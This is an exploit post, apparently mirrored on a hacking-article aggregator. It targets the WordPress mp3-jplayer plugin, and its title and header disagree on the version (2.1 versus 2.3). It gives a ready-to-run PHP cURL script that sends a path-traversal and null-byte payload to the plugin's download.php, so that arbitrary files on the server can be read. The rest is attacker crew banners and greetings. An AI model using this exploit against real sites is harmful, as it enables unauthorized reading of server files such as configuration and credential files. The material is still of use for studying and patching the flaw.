HackDig : Dig high-quality web security articles for hackers

WordPress MP3-Jplayer 2.1 Local File Disclosure

2015-03-24 12:55

<?php
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
# *----------------------------* #
# K |....##...##..####...####....| . #
# h |....#...#........#..#...#...| A #
# a |....#..#.........#..#....#..| N #
# l |....###........##...#.....#.| S #
# E |....#.#..........#..#....#..| e #
# D |....#..#.........#..#...#...| u #
# . |....##..##...####...####....| r #
# *----------------------------* #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
# >> D_x . Made In Algeria . x_Z << #
###########################################
#
# [>] Title : WordPress plugin (mp3-jplayer v2.3) Local File Disclosure
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Disclosure
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://mp3-jplayer.com
#
###########################################
#
# [!] Description :
#
# Wordpress plugin mp3-jplayer v2.3 is suffer from local file disclosure,
# remote attacker can Download/Disclosure file's from the root-path.
#
# ExpLO!T :
# -------
#
$dz = curl_init();
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/mp3-jplayer/download.php?mp3=[ LFI
]%00.mp3"); # or ../remote/downloader.php?mp3=[ LFI ]%00.ogg
curl_setopt($dz, CURLOPT_HTTPGET, 1);
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($dz, CURLOPT_TIMEOUT, 0);
$buf = curl_exec ($dz);
curl_close($dz);
unset($dz);
echo $buf;

####
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####

# REF : http://k3dsec.blogspot.com/2015/03/wordpress-plugin-mp3-jplayer-v23-local.html

?>

References:

http://k3dsec.blogspot.com/2015/03/wordpress-plugin-mp3-jplayer-v23-local.html


Source: 3610305102-BLW/eussi/moc.ytirucesxc

Read:4269 | Comments:0 | Tags:No Tag

“WordPress MP3-Jplayer 2.1 Local File Disclosure”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools

Tag Cloud